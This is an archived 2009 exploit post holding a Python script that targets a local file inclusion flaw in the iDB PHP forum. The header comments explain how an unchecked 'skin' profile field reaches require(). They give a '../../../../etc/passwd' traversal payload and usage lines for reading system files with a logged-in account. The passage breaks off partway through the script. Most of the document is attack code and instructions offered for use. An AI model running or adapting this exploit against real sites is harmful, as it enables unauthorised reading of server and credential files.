idb-lfi.txt
Posted on 07 April 2009
#!/usr/bin/env # LOTFREE 2009 - lotfree.next-touch.com # Local require() vulnerability in iDB (a PHP/MySQL BBS) # Test on version 0.2.5 Pre-Alpha SVN 243 (released March 30, 2009) # # No checks are made on var "skin" in inc/profilemain.php before saving it to database # this value is then require()d in mysql.php as $_GET['theme'] (global var is overwritten) : #=> require($SettDir['themes'].$_GET['theme']."/settings.php"); # so if we set "skin" to (for example) "../../../../../etc/passwd " we can get the passwd # file content :) # skin is saved to mysql as "UseTheme" in table idb_members # !! the type is "varchar(26)" so we are limited in injection :( !! # # Website of iDB : http://idb.berlios.de/ - http://sourceforge.net/projects/freshmeat_idb/ import urllib, urllib2, sys print " LOTFREE - iDB local PHP file inclusion vulnerability exploit " if len(sys.argv)!=5: print "Usage: python LOTF-iDB.py <forum_root> <local_path_for_inclusion> <login> <password>" print "e.g: python LOTF-iDB.py http://localhost/iDB/ ../../../../etc/passwd johndoe s3cr3t" print "use python LOTF-iDB.py <forum_root> iDB <login> <password> to restore the default skin" sys.exit() forum_root = sys.argv[1] if forum_root[-1]!="/": forum_root += "/" username = sys.argv[3] password = sys.argv[4] skin = "" if sys.argv[2]=="iDB": skin = "iDB" else: skin = sys.argv[2]+"